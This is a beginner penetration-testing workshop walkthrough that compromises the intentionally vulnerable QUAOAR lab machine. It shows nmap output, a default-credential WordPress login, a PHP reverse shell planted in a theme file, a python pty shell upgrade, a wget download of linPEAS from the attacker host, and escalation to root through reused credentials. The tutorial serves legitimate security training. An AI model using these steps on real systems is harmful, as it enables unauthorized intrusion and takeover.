Pentesting 1 : Introduction to Penetration Testing

What We'll Learn

In this codelab we'll learn some basic techniques for penetration testing. We have prepared a vulnerable machine on which we can perform our "testing" locally so that everything works as intended.

We have covered the basics of Kali Linux in the previous workshop, and so the only requirement is to download the target machine, QUAOAR and just follow the easy installation steps (for VirtualBox).

This is how the machine should look like so you know it is indeed working properly. virtual box

We will start right of the bat with the network recoinassence. For that, we will use a tool called nmap. This will automatically find the open ports of our machine. See the image below on the command that we have used.

nmap

As we can tell from the nmap scan, there are a lot of interesting ports. Should we want to investigate further, a more comprehensive nmap command will surely provide some vital information:

# Nmap 7.80 scan initiated Wed Nov 11 19:24:25 2020 as: nmap -p- -A -oN nmap 192.168.1.45
Nmap scan report for Quaoar.home (192.168.1.45)
Host is up (0.00063s latency).
Not shown: 65526 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d0:0a:61:d5:d0:3a:38:c2:67:c3:c3:42:8f:ae:ab:e5 (DSA)
|   2048 bc:e0:3b:ef:97:99:9a:8b:9e:96:cf:02:cd:f1:5e:dc (RSA)
|_  256 8c:73:46:83:98:8f:0d:f7:f5:c8:e4:58:68:0f:80:75 (ECDSA)
53/tcp  open  domain      ISC BIND 9.8.1-P1
| dns-nsid: 
|_  bind.version: 9.8.1-P1
80/tcp  open  http        Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_Hackers
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open  pop3?
|_pop3-capabilities: SASL PIPELINING UIDL RESP-CODES TOP STLS CAPA
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_ssl-date: 2020-11-11T18:27:11+00:00; -1s from scanner time.
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: post-login listed LITERAL+ IMAP4rev1 have more IDLE OK SASL-IR ID ENABLE STARTTLS capabilities Pre-login LOGINDISABLEDA0001 LOGIN-REFERRALS
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_ssl-date: 2020-11-11T18:27:11+00:00; -1s from scanner time.
445/tcp open  netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP)
993/tcp open  ssl/imap    Dovecot imapd
|_imap-capabilities: post-login listed LITERAL+ IMAP4rev1 have AUTH=PLAINA0001 IDLE OK SASL-IR ID ENABLE more capabilities Pre-login LOGIN-REFERRALS
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_ssl-date: 2020-11-11T18:27:11+00:00; -1s from scanner time.
995/tcp open  ssl/pop3    Dovecot pop3d
|_pop3-capabilities: USER PIPELINING UIDL SASL(PLAIN) TOP RESP-CODES CAPA
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_ssl-date: 2020-11-11T18:27:11+00:00; -1s from scanner time.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 49m59s, deviation: 2h02m28s, median: -1s
|_nbstat: NetBIOS name: QUAOAR, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.6.3)
|   Computer name: Quaoar
|   NetBIOS computer name: 
|   Domain name: home
|   FQDN: Quaoar.home
|_  System time: 2020-11-11T13:27:03-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

As you can tell, there really are a lot of open ports; however, there is an interesting one for the keen eye. On port 80, nmap found that there is robots.txt which is, in fact, a really common way of "giving away" free Vulnerable machine hints. This would want to simulate the real-world scenario where you could find some paths which shouldn't normally be available and thus leak some server information.

To add something here, we can use another commonly used tool called nikto. Nikto is a web-application security tool which finds low-hanging fruits such as what technology is used on the web server, what kind of common directories it has, etc. Here you have the output of running nikto on our target.

nikto nikto_output

Nikto found something interesting here, and to be more specific it tells us that the server has a Wordpress page running on it. Should have we visited robots.txt at first however, we would see that there we also have hinted that there is Wordpress installed.

robots.txt

If you did not know that already(hopefully you did), Wordpress is a free and open-source content management system written in PHP and paired with a MySQL or MariaDB database. Features include a plugin architecture and a template system, referred to within WordPress as Themes. (Wikipedia definition) 62% of CMS websites are built using it, and that only shows how often you will encounter this application while doing penetration testing(whether in real world or simply in CTF challenges).

After accesing the /wordpress path, we can see that there is a login form. Almost 30% of WordPress websites takeovers have been a result of default credentials that have not been reseted ever since installing WordPress. Thus, the first thing that you should always do when you encounter CMS's of any kind should be: 1) Looking up for default credentials and 2) Trying a combination of those credentials with other common credentials(such as admin/ admin , admin/password) etc.

wordpress_login

In this case, admin/admin did the work and we can successfully login as a WordPress admin.

wordpress_mainpage

Here is the homepage of the Wordpress page from our target. We could poke around the settings and rest of the plugins, however it will be a waste of time. Now it is the time to find a way of connecting to the server itself, because Wordpress can execute code (for getting a reverse shell) if you know how to tell it to do so.

A quick search on our friend Google for Wordpress reverse shell will bring the following concludent results:

404_reverseshell_injection

Following the guide from there, we inject the reverse shell code from pentest monkey into the 404.php file from the twenty fourteen theme as so:

404_wordpress_target

After we adapted the ip and port to our attacking machine one's we can save click Update File. We can find our machine's ip as follows:

my_ip

After that, we can use netcat to start listening for incoming connections(ofc i'll pick port 1337 for that)

nc_listening_port

Voilla! We are connected :) We will also use a little trick(I will post a link with more common used tricks in penetration testing, but for now just do as we show you :) )

python -c 'import pty; pty.spawn("/bin/bash")'

This will escape the current "bash jail" and allow us to execute commands from within the bash shell, just as we would normally do through the terminal/ connecting through the ssh.

Normally, after gaining foothold, one would start looking for ways to escalate their privileges within the system hierarchy, aiming for the root user. In our case, we can start with a trick, this would involve using an automated vulnerability scanner for local privilege escalation, called linPEAS(put a link to it here)

The easiest way of dragging the vulnerability scanner script is through http, and for that I create a simple http server with python :

simple_http_server

And then grab the file from the target machine with wget http://192.168.1.122/linpeas.sh

After we have the file, we can run it and then investigate the results.

linpeas_results

The first result will indicate a Kernel Exploit, however this would just be the simple path and you don't want that every time, so for this workshop we will just skip that way.

linpeas_mysql

As we were searching for some interesting information in the output of linpeas, we find some mysql credentials. In this case, we see that the username and password would also match a Linux username and password, and if we tried connecting to the sudo user with su and using the password found by linpeas... surprise surprise:

root

We are root! Also get the flag.txt, which is usually what you would look for in this kind of pentesting challenges.